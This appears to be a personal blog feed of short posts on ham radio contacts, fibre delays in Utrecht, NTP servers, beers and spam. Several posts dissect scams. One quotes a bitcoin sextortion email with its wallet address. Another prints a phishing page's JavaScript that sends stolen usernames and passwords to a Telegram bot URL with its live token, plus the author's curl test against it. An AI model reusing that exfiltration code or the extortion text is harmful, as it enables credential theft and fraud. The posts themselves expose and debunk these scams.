The whole development in generating text and images with "AI" which I see as mostly "hallucinating based on language patterns" has a lot of downsides in my opinion. So far these models have been capable of creating well-written disinformation complete with convincing sounding reasoning or have generated false images where the wrong number of fingers on a hand was the only indication something was not real.

So I don't like it, and at this moment I want to make clear that things I write here on this site are written by an actual human. To help that I wanted to create a web button in the style used years ago when we actually all had our own 'blog' and wanted to share things, not 'monetize' (verbing weirds language!).

It took me a while to find what I wanted, but the term I thought I wanted was 'web badge'. This lead me to a lot of 88px wide by 31px high buttons, but that was not the style I was looking for. Eventually I searched based on the size of an image I already used:

This image is 80px wide by 15px high. Searching for that gave me ACA 80x15 Brilliant Button Maker: Make your antipixel button with one click! which makes those button.

And this is the new button which will be in the footer of lots of pages on this site:

So the human readers can see an actual human wrote the text.

Ondertussen lijkt de plandatum voor die Open Dutch Fiber aansluiting nog harder naar achteren te kunnen gaan. Nu is de melding van Glasvezel in Utrecht - Open Dutch Fiber:

Glasvezel is binnekort beschikbaar op jouw adres. Wij verwachten klaar te zijn in jouw wijk in december 2025.

De geschiedenis:

• 15 januari 2023: In het 1e kwartaal 2024 komen wij bij jou in de wijk.
• 4 januari 2024: In het 3e kwartaal 2024 komen wij bij jou in de wijk.
• 29 maart 2024: In het 1e kwartaal 2025 starten wij onze werkzaamheden bij jou in de wijk.

De gemeente Utrecht wil het aanleggen van glasvezel af hebben voor 2027. Ik ben benieuwd of ze dat halen met deze hoeveelheid uitstellen.

Ander netwerk

Ondertussen lijkt KPN glasvezel al helemaal geen plannen voor ons adres te hebben, vast vanwege de beloftes van ODF gecombineerd met de afspraak met de gemeente om elkaar niet in de weg te zitten.

Glasvezel voor slooppanden

Tegelijkertijd steken er voor slooppanden aan de Troelstralaan wel glasvezels van Open Dutch Fiber uit de grond. Dit plan tot slopen en herbouw was al jaren bekend, dat daar dan toch glasvezel aangelegd wordt geeft me niet veel vertrouwen in de planning van Open Dutch Fiber.

The texts have been updated somewhat, but the gist is still the same:

Well, hello there, my perverted friend.
I'll get right to the point.
We've actually known each other for a while now, at least I've known you.
You can call me Big Brother or the All-Seeing Eye.
I'm a hacker who a few months ago gained access to your device, including your browser history and webcam.
And I recorded some videos of you jerking off to highly controversial "adult" videos.
I doubt very much you'd want your family, coworkers, and your entire contact list to see footage
of you pleasuring yourself, especially given the specifics of your favorite genre.
I'll also put these videos on porn sites, and they'll go viral, so much so that it will be physically impossible to remove them from everywhere.

How did I do that?
Because of your disregard for Internet security, I was able to easily install a Trojan horse on your device.
which accessed all the data on your device and allowed me to control it remotely.
Once I infected one device, I had no problem accessing all the other devices.
My spyware is embedded in the drivers and updates its signature every few hours, so no antivirus or firewall can even detect it.
So now I'm just gonna give you a condition. A small sum in exchange for your former quiet life.
Transfer 1200 USD to my bitcoin wallet:
3E5kH22Z5ozUhfqg3emYDQ9oDy1frgq3mr
As soon as I receive confirmation of the transfer, I will delete all the videos that compromise you, remotely erase the virus on your devices and you will never hear from me again.
Agree, it's a very small price to pay for not destroying your reputation in the eyes of others who, judging by your correspondence in messengers,
has an opinion of you as a decent human being.
You can think of me as a kind of mentor who wants you to start appreciating what you have.
You have 48 hours - I'll be notified as soon as you open this letter, and from then on it's a countdown.
If you've never dealt with cryptocurrency before, it's super easy - type "crypto exchange" into a search engine, and the next thing to do.
Here's what you shouldn't do:
Don't reply to my email. It was sent from a disposable e-mail account.
Don't call law enforcement. Remember, I have access to all of your devices, and as soon as I notice such activity, it will automatically lead to the release of all of your data.
Do not attempt to reinstall your system or factory reset your device.
First of all, I already have the video and all your data, and secondly, as I already said, I have remote access to all your devices and as soon as I notice such an attempt, it will lead to irreversible consequences.
Remember that crypto-addresses are anonymous, so you won't be able to figure me out from my wallet.
Anyway, let's make this a win-win situation.
I always keep my word, unless I'm being tricked. 
Advice for the future: take more seriously your security on the Internet. Also regularly change passwords and set up multi-factor authorization on all your accounts.

As always: this is a scam, nothing happened, the sender has absolutely nothing, just a wish to have hard to trace money come in.

Earlier items about bitcoin extortion scams: Earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier (although I think bitcoin is generally a really bad idea and a huge scam)

Update

I just noticed a variant of this scam which purports to have used the Pegasys spyware to get the information. If that was really true the amount in the scam message would need to be higher to pay for it!

Yet more countries showing up and making the contact. This time both were only in digital mode (FT8), no morse yet.

First I saw 3D2AJT active on 17 meter FT8. It's a special event callsign in memory of "Zorro" JH1AJT and I saw that Fiji Islands was a new country for me, so I made the contact.

I also saw the A8OK dxpedition to Liberia active and had a contact in FT8 on the 20 meter band. I was somewhat lucky as I saw them 'restart' the transmitters and I was able to jump on the first CQ. They were also active in morse on the 17 meter band but a lot more people wanted that contact and I didn't have the time to sit behind the radio for hours.

Update 2024-04-13

Added A8OK on the 17 meter band in FT8 where I was one of the few (???) stations responding. Adding them in morse was a lot harder! After a session of about 40 minutes sending my call on the 10 meter band in morse I finally got through.

Last weekend was the EA RTTY Contest as organized by the Spanish amateur radio club URE.

I participated Saturday evening, the rest of the weekend was filled with other things. I made 30 contacts and stayed on the 20 meter band, so I entered as a single band (20m) operator.

I got a few stations from the USA and Canada in the log, which can be somewhat remarkable at the current propagation, but these are probably big contest stations with enough power and good antennas. The very remarkable contact was my first RTTY contact with Australia!

The end result was 30 contacts including 12 unique Spanish provinces.

The portable multiband vertical antenna based on Teleskop 1/4 Lambda Vertikal - Draussenfunker.de had been on the project heap for two months now. I did some tests on how to connect the radials but until recently I didn't have a working way to make the connection. Crimping connectors on 8 small wires at once did not make a solid connection.

My new idea was to use a distribution block (Dutch: kroonsteentje) to connect the wires. I tinned all the 31 wires. I found out that 8 wires wouldn't fit easily in a 1.5 mm2 opening so I redistributed them: from 3*8 + 1*7 to 4*6 + 1*7. That fit, and I connected all the wires on the other side of the distribution block together and to one wire to make an earth connection at the foot of the vertical antenna.

The original plan was to test the antenna in the back yard after I was done, but it started to rain. Later there was a break in the rain long enough to go outside with the antenna analyzer. I found out I could get a reasonable match on 20, 17 and 15 meter bands. It was harder to find reasonable match (SWR < 2.0) on the 12 and 10 meter bands. I originally planned to also try with the radio (the Yaesu FT857D) but it started to look dark again and I brought everything back in. And yes, it started raining again.

Progress on this project, this can be a nice antenna for /P activities. Or to add the 15 meter band at home for contests.

In the phishing mail today:

   Hello;
   Your Office Email Has a New Voicenote From ITSupport @ idefix.net

   New Voice Message Details:

   Received from:
   ITSupport @ idefix.net

   Date/Time:

   3/31/2024 4:26:27 a.m.

   Duration:

   03:21 secs.

   VM Transcript:

   RE: Account suspension notice//23 Pending Messages.FYO

   Play Messages:

   Download/view attached messages

There is an attachment which is also html, and looking into this I see a standard phishing form asking for username and password, and handling this in the following way:

                    var apiss = "https://api.telegram.org/bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20" + mail + "%0Apassword%20%3A%20" + passwd + "%0A";
                    var xhr = new XMLHttpRequest();
..
                    xhr.open('GET', apiss, true);
                    xhr.send();

So this is easy to test...

$ curl -v 'https://api.telegram.org/bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20president@whitehouse.gov%0Apassword%20%3A%20kensentme%0A'
*   Trying 2001:67c:4e8:f004::9:443...
* Connected to api.telegram.org (2001:67c:4e8:f004::9) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.0 (OUT), TLS header, Certificate Status (22):
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS header, Certificate Status (22):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS header, Finished (20):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.2 (OUT), TLS header, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=api.telegram.org
*  start date: Mar 26 07:39:18 2023 GMT
*  expire date: Apr 26 07:39:18 2024 GMT
*  subjectAltName: host "api.telegram.org" matched cert's "api.telegram.org"
*  issuer: C=US; ST=Arizona; L=Scottsdale; O=GoDaddy.com, Inc.; OU=http://certs.godaddy.com/repository/; CN=Go Daddy Secure Certificate Authority - G2
*  SSL certificate verify ok.
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* Using Stream ID: 1 (easy handle 0x564250509eb0)
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
> GET /bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20president@whitehouse.gov%0Apassword%20%3A%20kensentme%0A HTTP/2
> Host: api.telegram.org
> user-agent: curl/7.81.0
> accept: */*
> 
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* Connection state changed (MAX_CONCURRENT_STREAMS == 128)!
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
< HTTP/2 200 
< server: nginx/1.18.0
< date: Sun, 31 Mar 2024 18:35:01 GMT
< content-type: application/json
< content-length: 343
< strict-transport-security: max-age=31536000; includeSubDomains; preload
< access-control-allow-origin: *
< access-control-allow-methods: GET, POST, OPTIONS
< access-control-expose-headers: Content-Length,Content-Type,Date,Server,Connection
< 
* Connection #0 to host api.telegram.org left intact
{"ok":true,"result":{"message_id":7322,"sender_chat":{"id":-1002016417277,"title":"revengebotchannel","type":"channel"},"chat":{"id":-1002016417277,"title":"revengebotchannel","type":"channel"},"date":1711910101,"text":"NEW LOGIN\n\nmail : president@whitehouse.gov\npassword : kensentme","entities":[{"offset":18,"length":24,"type":"email"}]}}

So there is a telegram channel 'revengebotchannel' and I just posted a report of a new phished account there. Although I don't think those credentials will work. This is the second phishing attempt I see for a different address but with the same bot api data, so someone with time on their hands could write a script to spam 'revengebotchannel' with fake login data.

An interesting way of not having to host a phishing site somewhere with a chance of takedown, but just let people run this as a local file in their browser.

Update: keeps going

Ten days later I see different phishing, this time trying to get me to view a proof of payment, but with the same api key to post the result. It looks like the 'message_id' is an increasing number specific for this chat. The number 7322 would mean 7322 messages have been exchanged in this channel?

A strong blonde beer with a typical taste. I would call it 'peaty' and not 'smoked' but that's because I am familiair with malt whisky tastes.

It's a bit strong for what I expect from a blonde beer: 8.5 % alcohol by volume. The label on the front of the bottle clearly says 'Cornet oaked smoked', the label on the back (and the website) call it 'Cornet smoked'. Colour is light yellow, not very clear, almost reminding me of white beer.

The beer details

Company	Cornet
Beer name	Cornet smoked
Beer style	Blonde
Alcohol by volume	8.5 %

Another chance to get a new entity/country in my logs: the EI DX Group was in Lesotho.

Lesotho is a small country in the southern part of the African continent. It is completely surrounded by South Africa, but it has been an independent country since 1966. More information on the country of Lesotho can be found in Wikipedia.

I chased this dxpedition last Wednesday and it didn't happen in FT8. But it did happen in morse. What helped a lot was a remark I heard at the radio club from a very active DXer about their morse handling. I still learn new things in amateur radio!

I also got confirmation of this contact within 3 days via Logbook of The World, which I really did not expect. I will probably still request a QSL card and pay for it.

The statistics in entities worked/confirmed

I now have made contacts with 189 different amateur radio entities in total, with 177 confirmed. In morse I have made contacts with 117 different amateur radio entities of which 108 are confirmed.

Sometimes I really wonder what the scam is behind some spam I receive. Recently I've seen a few of this type, where the spam uses a lot of words to say "I see a charge for something on your website, could you please explain". A lot of words, but things that would help the receiver find the transaction are all missing, like amount, transaction numbers, name of the website where you "found" that contact information.

So clearly the next step the scammer wants is for the webshop owner to reply with a lot of questions. I wonder what happens next. Maybe I should reply from a webmail account.

Text of the version seen today:

   Dear,
   I hope this message finds you well. I'm writing to bring to your
   attention an unexpected charge that appeared on my PayPal account,
   which seems to have been made on your online shop.
   This came as a disbelief to me, as I have never engaged with your
   platform before. I've reached out to my bank and have started the
   necessary actions to dispute this claim, including filing a report with
   the relevant authorities.
   It would be helpful if you could provide me with any pertinent details
   about the transaction, like the order number, and any other information
   you think may help clarify the situation.
   I should clarify that I have substantial evidence, including bank
   statements and other documents, to support my claim that I did not
   authorize this transaction.
   I'm looking forward to your prompt response on this matter.
   Best regards,
   Judy Sharp

Found in the local supermarket, a really German beer from Erdinger. Edinger is quite proud of brewing it according to 'Bayerische Edelreifung'.

In taste it is what I expect of a white beer, but a touch more bitter compared to others.

The beer details

Company	Erdinger
Beer name	Weißbier
Beer style	White beer
Alcohol by volume	5.3 %

A while ago I got tired of constant SMTP attempts from addresses within the 46.148.32.0/20 range. So I set up a special firewall rule for it. This range points to a location in Iran which has a lot of office routers in it but a small part of it seems to be a pool of virtual servers.

Today I had a look in the mail log because I was expecting a mail which didn't arrive, but I saw a very similar pattern...

Mar 22 16:28:50 gosper sm-mta[10196]: STARTTLS=server, relay=[80.244.11.147], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:28:53 gosper sm-mta[10196]: 42MFSowG010196: [80.244.11.147] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:28:54 gosper sm-mta[10198]: STARTTLS=server, relay=[80.244.11.132], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:29:04 gosper sm-mta[10198]: 42MFSsUs010198: [80.244.11.132] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:29:30 gosper sm-mta[10241]: STARTTLS=server, relay=[80.244.11.151], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:29:33 gosper sm-mta[10241]: 42MFTUfC010241: [80.244.11.151] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:12 gosper sm-mta[10338]: STARTTLS=server, relay=[80.244.11.98], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:15 gosper sm-mta[10338]: 42MFUCVC010338: [80.244.11.98] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:21 gosper sm-mta[10345]: STARTTLS=server, relay=[80.244.11.95], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:26 gosper sm-mta[10345]: 42MFULOt010345: [80.244.11.95] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:31 gosper sm-mta[10351]: STARTTLS=server, relay=[80.244.11.82], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:37 gosper sm-mta[10351]: 42MFUUrC010351: [80.244.11.82] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL

So now 80.244.11.0/24 is added to the same firewall rule. And again this is in Iran with very comparable traffic.

I had some time to look at why the rebuilt ntp server with ntpsec wasn't accepting NMEA/PPS and found [Solved] NTPSec: no servers found error despite finding the server.

I edited /etc/ntpsec/ntp.conf adding my own server lines (first in the peer 127.127 notation, later with refclock and minimizing the external clocks to 1 as backup. But I got 'bitten' by this bit of configuration:

# Comment this out if you have a refclock and want it to be able to discipline
# the clock by itself (e.g. if the system is not connected to the network).
#tos minclock 4 minsane 3

ntpsec with 3 configured clocks and 'tos minclock 4' will happily start and not report a configuration error, but it will never start disciplining the local clock.

After commenting it out the local NMEA/PPS clock is selected after a few minutes, but after running for a while the local NMEA/PPS clock is again seen as a falseticker, but at least the ntpd process is disciplining the local clock and serving time.

$ ntpq -pn
     remote           refid      st t when poll reach   delay   offset   jitter
===============================================================================
*2a00:d78:0:712: .MRS.            1 u   20  128  377  15.6924 -11.6730   1.9191
xPPS(0)          .PPS.            0 l   58   64  377   0.0000  -8.9242   1.3533
xNMEA(0)         .GPS.            0 l    4   64  377   0.0000 -67.2428   0.9995

Without ntp disciplining the clock the error was more than 5 seconds within a week, so by itself the raspberry Pi isn't a very good timekeeper.

I'm not sure I'm completely happy with the change to ntpsec.

Trying with ntpd built from source

I got too annoyed with ntpsec not accepting the NMEA/PPS clock, I want a timeserver that can work standalone from the time information available from the GPS hat.

With ntpd built from the authoritive source Network Time Protocol I get better results after a while. Good time takes a bit of time. Now the local GPS NMEA stream and PPS pulses are seen correctly:

$ ntpq -pn
     remote           refid      st t when poll reach   delay   offset   jitter
===============================================================================
o127.127.22.0    .PPS.            0 u    6   16  377    0.000    2.594    0.489
*127.127.20.0    .GPS.            0 u   12   16  377    0.000   18.134    1.479
+2a00:d78:0:712: .MRS.            1 u   59   64  377   15.268    2.276   13.940

Letting this run for a while

After a few hours the NTP pool was happy again with my server and it was in the rotation. Soon over 600 unique clients had done requests for the current time.

This website (and others I host) follow the security.txt standard. The websites get scanned regularly anyway, and maybe some of those scans are specifically aimed at finding a vulnerability in a website linked to me as a person, and not just a scan of a random site on the Internet.

So in case someone finds a vulnerability and wants to report it, they can find the contact information in a well-known format.

So far I've had some enquiries about a bug-bounty program, but as this is a private site I'm not considering that at the moment. The best I can do is a 'Hall of Fame'.

Currently the Rockall group is in Grenada which is a part of the West Indies islands in the Carribian Sea. Entry on Grenada in Wikipedia. As I didn't have Grenada in my amateur radio logs yet I wanted to get it in the log, but the weeks of the DXpedition were also filled with lots of other things that didn't leave me much time. During the last days of the DXpedition I finally got around to sitting down and trying to work them. The first contact was 17 meter FT8 on Thursday evening and today (Saturday), officially the last day of the DXpedition I managed to get in the log on 12 meter CW, right on time.

I had already tried getting through on CW on Thursday and Friday evening, but the Americas are always the hard DX from my location because there is a lot of house between my antenna and that part of the world. And I recently learned that European DXers start with a 1 kiloHerz split on CW, and American DXers with a 2 kiloHertz split. Even though they are from Belgium they were mostly making contacts at 2 kiloHertz split and above.

While I was installing perlman as my new radio desktop the nanokeyer sent a question mark ? at me, which can only be caused by something on the computer sending characters over the serial interface. This reminded me of removing modemmanager to avoid conflicts with other serial devices.

This time I had already removed modemmanager so it was something different. I found out brltty is another program which probes serial ports.

I can fully support brltty wanting to autoconfigure stuff so a blind person doesn't need a seeing person to configure their computer first, but I don't like programs probing any serial port. So I also disabled and removed brltty and now the nanokeyer has no more question marks for me.

The proxmark3 manual has a dire warning in Modem Manager must be discarded:

ModemManager is a real threat that can lead to a bricked Proxmark3, read this very attentively.

and I thought the interaction between brltty and the Proxmark3 could have the same issue. But brltty seems to be looking for specific USB serial adapters (ch341 based).

If I read Bug #1990189 “brlttty claiming CH341 usbtty device blocking acce...” : Bugs : brltty package : Ubuntu correctly work is being done on making the udev rules for the brltty driver be more specific to the braille tty devices using this ch341 chip. In the interim: be careful.

The home timeserver I built in 2020 stopped responding and it turned out the MicroSD card was starting to give errors. So time to take one of the newer MicroSD cards and rebuild the system. Of course the rebuild is done with the latest version of Raspbian / Raspberry Pi OS: Raspbian GNU/Linux 12 bookworm.

This means some things are newer and need time to sort out what has changed and what the new methods are.

ntpsec

The ntp server software is now ntpsec, but almost all of the configuration seems to be the same. I haven't got PPS running at the moment, somehow ppstest is satisfied but ntpsec is showing the PPS peer in reject state.

w1retap

There is a w1retap project on sourceforge and a tree on github, but the real new location to find it is stronnag / w1retap: w1retap is an application to log data from Dallas 'one wire' sensors to relational databases or files. It is developed on Linux, but should be portable to other POSIX systems. on codeberg.org as linked from Netley Marsh 1 Wire Weather Station - Technical Information. Building w1retap was completely different with meson and ninja which are absolutely new to me. Building the programs did work and resulted in a working program. At the moment there is no readout of the humidity sensor, but without any logging about trying to read it.

Lately the 'radio workstation' thompson was having trouble with the load caused by decoding FT8. Or rather I couldn't do much else while wsjt-x was decoding signals, starting anything else cpu intensive would cause delays. And the old annoyance that I couldn't let the screensaver set the monitors to powerdown because it would make one monitor go away and appear again was still happening.

So time for something new. Or less old. A new PC would be complete overkill for what I do with it! I decided to go with a refurbished Lenovo small form factor PC. I just wanted faster CPU and I/O, enough display outputs to drive two monitors via digital connections and enough USB for connections to radio(s), morse keyer(s), keyboard and mouse.

I found a nearby computerstore specializing in refurbished PCs. I went with a Lenovo ThinkCentre M710s with 16 Gb memory and 256 Gb nvme storage. In a nice small case. The shop sold it with Windows 11 Pro pre-installed. The seller asked what I wanted to do with it and when I said I wanted to 're-educate it with Linux' he smiled and did not go into standard things about Windows. The built-in video is an Intel HD Graphics 630.

Making the USB stick to do the installation took longer than the actual installation. Graphics worked fine out of the box on two screens. The assumption that the left DisplayPort output will default to the left screen worked fine in Linux, so no hard work to change the screen layout this time.

After the first installation came the installation of amateur radio software and tuning things to make it work my way. I used my notes of how to install cqrlog in Ubuntu 22.04 and how to set up linux USB for the Yaesu FT-991a.

When I changed some things in DNS I ran into weird caching by systemd-resolved and I decided to throw that out (I have a perfectly good resolver at home where I like to have more control and insight) like in disabling systemd-resolved on thompson. After that firefox couldn't connect to anything, it seems the firefox snap as produced by Ubuntu is configured to use the 127.0.0.53 resolver directly. As I had some other annoyances with the firefox snap I just threw it out and switched to the .deb version, using the notes in How to Install Firefox as DEB on Ubuntu (Not Snap). I'll get the updates from the Mozilla team. I also changed the 'default webbrowser' from /snap/bin/firefox to /usr/bin/firefox to have menus and opening links from other applications working again.

Data saved by cqrlog, fldigi and wsjt-x was simply copied over. Currently PyHamclock doesn't work. I had to change some things for python3 and it still throws errors which I can't fix at the moment.

The name perlman is now added to The machine names.

Last weekend was the EA PSK63 contest organized by the Spanish radio amateur club URE each year. I participated mostly Saturday evening and Sunday morning, Saturday during the day I had other amateurradio-related things to attend.

In total I made 89 contacts, 68 on the 20 meter band and 21 on the 40 meter band. I gave the 10 meter band a try several times but heard/saw no other stations and nobody responded to a 'cq eapsk test' call.

No spectacular DX, a number of familiair contest calls in the log. The first contact in this contest was with EA4BAS and I think I have that call in the log of all spanish contests I participate in.

In the past I had some articles that got a higher number of visitors, and I added google adwords to those articles so I could maybe earn a few cents.

With 'higher number' I mean hundreds of views in a week, not a real slashdotting.

I always set the google ads to maximum privacy and minimal tracking, but even with that google started requesting a cookie consent banner for those ads. I guess web advertising without privacy invastion is impossible.

I saw a remark Note with

People be like "modern web sucks, I want le old internet back!"

Bruh, you can bring the "old" internet back any time you want. You can run a BBS, a gopher server, FTP, your own mail, your own http1 web server, your own blog, implement your own "retro" protocol, your own hidden service, and you even have a lot of revival projects for msn, myspace, etc. Like... you can bring it all back any time you want, bro.

But you are not going to do it. In the end, you are going to stay here. And accept the god damn cookies.

And I answered:

@enigmatico I rather share something on my own website for people with a similar problem to find than for some company to gobble up and reuse so the 1741 carefully selected advertisers can track the visitor and the site can maybe make a few cents.
That's what sucks about the modern web.

Because that is exactly what this website is for. Not to make money, but to share what I discover and want to share with the world. I happen to like writing about those things. And if something I write helps someone else solve a problem: good. I like finding shared solutions and good ideas.

So rather than give in to some privacy invastion I decided to disable the advertising code. Maybe I already invaded privacy with the earlier ads but this was a defining moment to stop.

In december 2022 schreef ik over Nederlandstalige bitcoin afpersing.

Blijkbaar is dezelfde afperser weer bezig of heeft iemand de tekst van deze afperser hergebruikt, want ik krijg vandaag in het overzicht van 'google search console' deze mooie melding:

Top growing queries Compared to previous month

helaas heb ik slecht nieuws voor je. enkele maanden geleden heb ik toegang gekregen tot de apparaten waarmee je op het internet surft. vervolgens heb ik je internetactiviteiten nagetrokken.

Zeer letterlijk dus de tekst uit het item. Ik hoop dat ik mensen heb kunnen leren dat dit alleen maar oplichting is.

I had the time and energy to pick up the Genexis Platinum-4410 router that I tried to find an entry into almost a year ago and see if I could think about other ways to get in.

Trying nmap

When I scan with nmap the result is just 'all ports are filtered'. By hand I see port 80 http. So there is some sort of firewall (all those other ports are not responding at all). This is confirmed when checking the firewall startup script which allows port 80 and 5000 from the LAN side.

Trying to get in via miniupnpd

The router has UPNP but it's disabled by default. When I enable it there is on port 5000:

Server: 1.11.0-R UPnP/1.0 MiniUPnPd/1.4

So searching for exploits I found b1ack0wl/miniupnpd_poc: Read out-of-bounds PoC for miniupnpd <= v2.1 and this failed. I kept getting the answer:

HTTP/1.1 501 Not Implemented
Content-Type: text/html
Connection: close
Content-Length: 149
Server: 1.11.0-R UPnP/1.0 MiniUPnPd/1.4

<HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>

Checking the /usr/bin/miniupnpd on the extracted image gives an idea why this isn't going to work:

SUBSCRIBE
SUBSCRIBE not implemented. ENABLE_EVENTS compile option disabled

Vulnerabilities in the webinterface

A search gave me Remote code execution in Genexis DRGOS and the original url with the exploit has been disabled but I found it with the wayback machine at Genexis DRGOS remote code execution in versions < 1.14.1.

The default firmware on the router is indeed 1.14.1, the old version is 1.14.0 which allows me to compare those two versions since I unpacked both of them to my laptop. In the shellscripts for the webinterface I see a lot more defensive programming avoiding similar exploits.

Considering USB storage

I see the device has a USB port and I wondered whether it supports usb-storage and how it automounts that storage.

Yes it supports usb-storage, but it mounts the storage in a fixed location, not using the volume label of the filesystem. When usb storage is introduced, the script /sbin/usb-storage mounts it on /mnt/usbdrive. And at the moment I see no service that actually does something with the mounted usb-storage.

Under the hood I see OpenWrt

I was looking at the bootup messages, and I noticed something:

Freeing init memory: 9680K
Please be patient, while OpenWrt loads ...
init started: BusyBox v1.11.2 (2015-08-13 10:17:55 CEST)

(none) login: uci: Entry not found

Saving / restoring the configuration

The configuration is saved directly from the configuration commands and is restored the same way. But there is a checksum involved which uses data that isn't available in the dump itself.

I found some discussion of this format in German at Firmware drgos-hrg1000-1.14.0-R - Bürger für Glasfaser Support.

Current status

I still haven't found any vulnerability that would let me get more access.

Yesterday I was checking the Reverse Beacon Network for interesting callsigns calling CQ in morse and I saw TR8CA from Gabon, which is a new country for me in amateur radio.

I managed to make the short contact without having to try for hours so that added the country as 'worked'. The next thing is getting it confirmed and I saw the confirmation in Logbook of The World today.

The Reverse Beacon Network uses amateur radio stations all over the world that automatically decode morse signals on amateur bands and try to find CQ messages with valid callsigns. This data is then processed and available via the Reverse Beacon Network main webinterface and via other ways such as HamAlert. For 'chasing' morse stations the Reverse Beacon Network together with HamAlert are a great help.

The earlier problems with DKIM verification at gmail seemed to come back and I searched high and low again and found Google says DKIM fails, everyone else says it passes : r/email on reddit which describes my situation. The specific reply try setting "Canonicalization" in the OpenDKIM setting to "relaxed/relaxed" as a lot of MTAs do an implicit 7bit/8bit conversion and that can break DKIM with a "simple" body canonicalization was the one thing I hadn't tried myself so I changed this.

The first test mails I sent to a gmail account verified all fine, so maybe this is the final fix. I'm not sure until I see regular positive DMARC reports from gmail.

Halverwege januari 2023 was de verwachting dat in het 1e kwartaal 2024 dat ODF bij mij in de wijk glasvezel zou aanleggen, begin januari 2024 was de verwachting geworden dat in het 3e kwartaal 2024 aangelegd zou worden en nu bijna twee maanden later kijk ik nog eens bij Glasvezel in Utrecht - Open Dutch Fiber en komt er uit

In het 1e kwartaal 2025 starten wij onze werkzaamheden bij jou in de wijk

In ieder geval schiet het niet op dus.